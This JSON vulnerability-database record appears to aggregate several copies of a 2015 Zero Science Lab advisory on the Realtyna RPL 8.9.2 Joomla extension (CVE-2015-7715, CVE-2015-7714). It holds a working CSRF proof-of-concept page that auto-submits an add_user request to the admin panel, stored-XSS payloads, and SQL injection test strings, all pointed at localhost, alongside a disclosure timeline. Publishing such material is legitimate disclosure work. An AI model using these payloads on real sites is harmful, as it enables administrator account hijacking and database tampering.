{"id": "PACKETSTORM:134067", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Realtyna RPL 8.9.2 CSRF / Cross Site Scripting", "description": "", "published": "2015-10-23T00:00:00", "modified": "2015-10-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/134067/Realtyna-RPL-8.9.2-CSRF-Cross-Site-Scripting.html", "reporter": "zeroscience.mk", "references": [], "cvelist": ["CVE-2015-7715"], "lastseen": "2016-12-05T22:16:05", "viewCount": 12, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7715"]}, {"type": "exploitdb", "idList": ["EDB-ID:38528"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04"]}, {"type": "zdt", "idList": ["1337DAY-ID-24460"]}, {"type": "zeroscience", "idList": ["ZSL-2015-5271", "ZSL-2015-5272"]}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:38528"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04"]}, {"type": "zdt", "idList": ["1337DAY-ID-24460"]}]}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/134067/ZSL-2015-5271.txt", "sourceData": "`Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities \n \n \nVendor: Realtyna LLC \nProduct web page: https://www.realtyna.com \nAffected version: 8.9.2 \n \nSummary: Realtyna CRM (Client Relationship Management) Add-on \nfor RPL is a Real Estate CRM specially designed and developed \nbased on business process and models required by Real Estate \nAgents/Brokers. Realtyna CRM intends to increase the Conversion \nRatio of the website Visitors to Leads and then Leads to Clients. \n \n \nDesc: The application allows users to perform certain actions \nvia HTTP requests without performing any validity checks to \nverify the requests. 
This can be exploited to perform certain \nactions with administrative privileges if a logged-in user visits \na malicious web site. Multiple cross-site scripting vulnerabilities \nwere also discovered. The issue is triggered when input passed \nvia the multiple parameters is not properly sanitized before \nbeing returned to the user. This can be exploited to execute \narbitrary HTML and script code in a user's browser session in \ncontext of an affected site. \n \nTested on: Apache \nPHP/5.4.38 \nMySQL/5.5.42-cll \n \nVulnerability discovered by Bikramaditya 'PhoenixX' Guha \n \n \nAdvisory ID: ZSL-2015-5271 \nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php \nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog \nCVE ID: CVE-2015-7715 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715 \n \n \n05.10.2015 \n \n-- \n \n \n1. CSRF: \n \n<html lang=\"en\"> \n<head> \n<title>CSRF POC</title> \n</head> \n<body> \n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\"> \n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" /> \n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" /> \n<input type=\"hidden\" name=\"format\" value=\"ajax\" /> \n<input type=\"hidden\" name=\"function\" value=\"add_user\" /> \n<input type=\"hidden\" name=\"id\" value=\"85\" /> \n</form> \n<script> \ndocument.getElementById('formid').submit(); \n</script> \n</body> \n</html> \n \n \n2. 
Cross Site Scripting (Stored): \n \nhttp://localhost/administrator/index.php \nPOST parameters: new_location_en_gb, new_location_fr_fr \n \nPayloads: \n \noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location \noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659994789, "score": 1659995475}, "_internal": {"score_hash": "4f7576b0b644bf4247da6f8e4d0d4558"}}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-23T00:00:00", "title": "Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting Cross-Site Request Forgery", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7715"], "modified": "2015-10-23T00:00:00", "id": "EXPLOITPACK:2D6B93425DAE9993F1A3957160BA5F04", "href": "", "sourceData": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\n\n\nVendor: Realtyna LLC\nProduct web page: https://www.realtyna.com\nAffected version: 8.9.2\n\nSummary: Realtyna CRM (Client Relationship Management) Add-on\nfor RPL is a Real Estate CRM specially designed and developed\nbased on business process and models required by Real Estate\nAgents/Brokers. 
Realtyna CRM intends to increase the Conversion\nRatio of the website Visitors to Leads and then Leads to Clients.\n\n\nDesc: The application allows users to perform certain actions\nvia HTTP requests without performing any validity checks to\nverify the requests. This can be exploited to perform certain\nactions with administrative privileges if a logged-in user visits\na malicious web site. Multiple cross-site scripting vulnerabilities\nwere also discovered. The issue is triggered when input passed\nvia the multiple parameters is not properly sanitized before\nbeing returned to the user. This can be exploited to execute\narbitrary HTML and script code in a user's browser session in\ncontext of an affected site.\n\nTested on: Apache\n PHP/5.4.38\n\t\t MySQL/5.5.42-cll\n\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\n\n\nAdvisory ID: ZSL-2015-5271\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\nCVE ID: CVE-2015-7715\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\n\n\n05.10.2015\n\n--\n\n\n1. CSRF:\n\n<html lang=\"en\">\n<head>\n<title>CSRF POC</title>\n</head>\n<body>\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" />\n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" />\n<input type=\"hidden\" name=\"format\" value=\"ajax\" />\n<input type=\"hidden\" name=\"function\" value=\"add_user\" />\n<input type=\"hidden\" name=\"id\" value=\"85\" />\n</form>\n<script>\ndocument.getElementById('formid').submit();\n</script>\n</body>\n</html>\n\n\n2. 
Cross Site Scripting (Stored):\n\nhttp://localhost/administrator/index.php\nPOST parameters: new_location_en_gb, new_location_fr_fr\n\nPayloads:\n\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-14T02:40:45", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2015-10-23T00:00:00", "type": "zdt", "title": "Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7715"], "modified": "2015-10-23T00:00:00", "id": "1337DAY-ID-24460", "href": "https://0day.today/exploit/description/24460", "sourceData": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\r\n \r\n \r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n \r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n \r\n \r\nDesc: The application allows users to perform certain actions\r\nvia HTTP requests without performing any validity checks to\r\nverify the requests. This can be exploited to perform certain\r\nactions with administrative privileges if a logged-in user visits\r\na malicious web site. Multiple cross-site scripting vulnerabilities\r\nwere also discovered. 
The issue is triggered when input passed\r\nvia the multiple parameters is not properly sanitized before\r\nbeing returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in\r\ncontext of an affected site.\r\n \r\nTested on: Apache\r\n PHP/5.4.38\r\n MySQL/5.5.42-cll\r\n \r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n \r\n \r\nAdvisory ID: ZSL-2015-5271\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7715\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\r\n \r\n \r\n05.10.2015\r\n \r\n--\r\n \r\n \r\n1. CSRF:\r\n \r\n<html lang=\"en\">\r\n<head>\r\n<title>CSRF POC</title>\r\n</head>\r\n<body>\r\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_rpl\" />\r\n<input type=\"hidden\" name=\"view\" value=\"addon_membership_members\" />\r\n<input type=\"hidden\" name=\"format\" value=\"ajax\" />\r\n<input type=\"hidden\" name=\"function\" value=\"add_user\" />\r\n<input type=\"hidden\" name=\"id\" value=\"85\" />\r\n</form>\r\n<script>\r\ndocument.getElementById('formid').submit();\r\n</script>\r\n</body>\r\n</html>\r\n \r\n \r\n2. 
Cross Site Scripting (Stored):\r\n \r\nhttp://localhost/administrator/index.php\r\nPOST parameters: new_location_en_gb, new_location_fr_fr\r\n \r\nPayloads:\r\n \r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location", "sourceHref": "https://0day.today/exploit/24460", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T13:57:59", "description": "Cross-site request forgery (CSRF) vulnerability in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allows remote attackers to hijack the authentication of administrators for requests that add a user via an add_user action to administrator/index.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-18T18:29:00", "type": "cve", "title": "CVE-2015-7715", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7715"], "modified": "2020-07-30T16:14:00", "cpe": [], "id": "CVE-2015-7715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7715", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zeroscience": [{"lastseen": "2021-12-15T06:43:27", "description": "Title: Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities \nAdvisory ID: [ZSL-2015-5271](<ZSL-2015-5271.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 22.10.2015 \n\n\n##### Summary\n\nRealtyna CRM (Client Relationship Management) Add-on for RPL is a Real Estate CRM specially designed and developed based on business process and models required by Real Estate Agents/Brokers. Realtyna CRM intends to increase the Conversion Ratio of the website Visitors to Leads and then Leads to Clients. \n\n##### Description\n\nThe application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. \n\n##### Vendor\n\nRealtyna LLC - <https://www.realtyna.com>\n\n##### Affected Version\n\n8.9.2 \n\n##### Tested On\n\nApache \nPHP/5.4.38 \n\n##### Vendor Status\n\n[05.10.2015] Vulnerability discovered. \n[06.10.2015] CVE-2015-7714 and CVE-2015-7715 assigned. \n[07.10.2015] Contact with the vendor. \n[07.10.2015] Vendor responded asking for details. \n[07.10.2015] Advisory and details sent to the vendor. 
\n[08.10.2015] Vendor confirms the vulnerability scheduling patch release date. \n[21.10.2015] Vendor releases version 8.9.5 to address these issues. \n[22.10.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[realtyna_xsscsrf.txt](<../../codes/realtyna_xsscsrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Bikramaditya Guha - <[bik@zeroscience.mk](<mailto:bik@zeroscience.mk>)> \nHigh five to lqwrm and crash! \n\n##### References\n\n[1] <http://rpl.realtyna.com/Change-Logs/RPL7-Changelog> \n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715> \n[3] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7715> \n[4] <https://cxsecurity.com/issue/WLB-2015100148> \n[5] <https://www.exploit-db.com/exploits/38528/> \n[6] <https://packetstormsecurity.com/files/134067>\n\n##### Changelog\n\n[22.10.2015] - Initial release \n[24.10.2015] - Added reference [4], [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-22T00:00:00", "type": "zeroscience", "title": "Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7714", "CVE-2015-7715"], "modified": "2015-10-22T00:00:00", "id": "ZSL-2015-5271", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php", "sourceData": "<html><body><p>Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities\r\n\r\n\r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n\r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n\r\n\r\nDesc: The application allows users to perform certain actions\r\nvia HTTP requests without performing any validity checks to\r\nverify the requests. This can be exploited to perform certain\r\nactions with administrative privileges if a logged-in user visits\r\na malicious web site. Multiple cross-site scripting vulnerabilities\r\nwere also discovered. The issue is triggered when input passed\r\nvia the multiple parameters is not properly sanitized before\r\nbeing returned to the user. This can be exploited to execute\r\narbitrary HTML and script code in a user's browser session in\r\ncontext of an affected site.\r\n\r\nTested on: Apache\r\n PHP/5.4.38\r\n\r\n\r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n\r\n\r\nAdvisory ID: ZSL-2015-5271\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7715\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715\r\n\r\n\r\n05.10.2015\r\n\r\n--\r\n\r\n\r\n1. 
CSRF:\r\n\r\n\r\n</p>\n<title>CSRF POC</title>\n<form action=\"http://localhost/administrator/index.php\" id=\"formid\" method=\"post\">\n<input name=\"option\" type=\"hidden\" value=\"com_rpl\"/>\n<input name=\"view\" type=\"hidden\" value=\"addon_membership_members\"/>\n<input name=\"format\" type=\"hidden\" value=\"ajax\"/>\n<input name=\"function\" type=\"hidden\" value=\"add_user\"/>\n<input name=\"id\" type=\"hidden\" value=\"85\"/>\n</form>\n<script>\r\ndocument.getElementById('formid').submit();\r\n</script>\r\n\r\n\r\n\r\n\r\n2. Cross Site Scripting (Stored):\r\n\r\nhttp://localhost/administrator/index.php\r\nPOST parameters: new_location_en_gb, new_location_fr_fr\r\n\r\nPayloads:\r\n\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location\r\noption=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location\r\n</body></html>", "sourceHref": "http://zeroscience.mk/codes/realtyna_xsscsrf.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T06:43:18", "description": "Title: Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities \nAdvisory ID: [ZSL-2015-5272](<ZSL-2015-5272.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data \nRisk: (4/5) \nRelease Date: 22.10.2015 \n\n\n##### Summary\n\nRealtyna CRM (Client Relationship Management) Add-on for RPL is a Real Estate CRM specially designed and developed based on business process and models required by Real Estate Agents/Brokers. Realtyna CRM intends to increase the Conversion Ratio of the website Visitors to Leads and then Leads to Clients. \n\n##### Description\n\nRealtyna RPL suffers from multiple SQL Injection vulnerabilities. 
Input passed via multiple POST parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\n##### Vendor\n\nRealtyna LLC - <https://www.realtyna.com>\n\n##### Affected Version\n\n8.9.2 \n\n##### Tested On\n\nApache \nPHP/5.4.38 \n\n##### Vendor Status\n\n[05.10.2015] Vulnerability discovered. \n[06.10.2015] CVE-2015-7714 and CVE-2015-7715 assigned. \n[07.10.2015] Contact with the vendor. \n[07.10.2015] Vendor responded asking for details. \n[07.10.2015] Advisory and details sent to the vendor. \n[08.10.2015] Vendor confirms the vulnerability scheduling patch release date. \n[21.10.2015] Vendor releases version 8.9.5 to address these issues. \n[22.10.2015] Coordinated public security advisory released. \n\n##### PoC\n\n[realtyna_sqli.txt](<../../codes/realtyna_sqli.txt>)\n\n##### Credits\n\nVulnerability discovered by Bikramaditya Guha - <[bik@zeroscience.mk](<mailto:bik@zeroscience.mk>)> \nHigh five to lqwrm and crash! 
\n\n##### References\n\n[1] <http://rpl.realtyna.com/Change-Logs/RPL7-Changelog> \n[2] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714> \n[3] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7714> \n[4] <https://cxsecurity.com/issue/WLB-2015100147> \n[5] <https://www.exploit-db.com/exploits/38527/> \n[6] <https://packetstormsecurity.com/files/134066> \n[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/107582>\n\n##### Changelog\n\n[22.10.2015] - Initial release \n[24.10.2015] - Added reference [4], [5] and [6] \n[31.10.2015] - Added reference [7] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-10-22T00:00:00", "type": "zeroscience", "title": "Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7714", "CVE-2015-7715"], "modified": "2015-10-22T00:00:00", "id": "ZSL-2015-5272", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php", "sourceData": 
"<html><body><p>\ufeff\r\nRealtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: Realtyna LLC\r\nProduct web page: https://www.realtyna.com\r\nAffected version: 8.9.2\r\n\r\nSummary: Realtyna CRM (Client Relationship Management) Add-on\r\nfor RPL is a Real Estate CRM specially designed and developed\r\nbased on business process and models required by Real Estate\r\nAgents/Brokers. Realtyna CRM intends to increase the Conversion\r\nRatio of the website Visitors to Leads and then Leads to Clients.\r\n\r\n\r\nDesc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.\r\nInput passed via multiple POST parameters is not properly sanitised\r\nbefore being returned to the user or used in SQL queries. This can\r\nbe exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nTested on: Apache\r\n PHP/5.4.38\r\n\r\n\r\nVulnerability discovered by Bikramaditya 'PhoenixX' Guha\r\n\r\n\r\nAdvisory ID: ZSL-2015-5272\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php\r\nVendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog\r\nCVE ID: CVE-2015-7714\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714\r\n\r\n\r\n05.10.2015\r\n\r\n--\r\n\r\n\r\nhttp://localhost/administrator/index.php\r\nPOST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard\r\n\r\nPayloads:\r\n\r\n- option=com_rpl&view=addon_membership_members&format=edit&id=84'\r\n- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text\r\n- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308'&copy_from=&copy_to=en_gb&copy_method=1\r\n- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/realtyna_sqli.txt", "cvss": {"score": 
6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}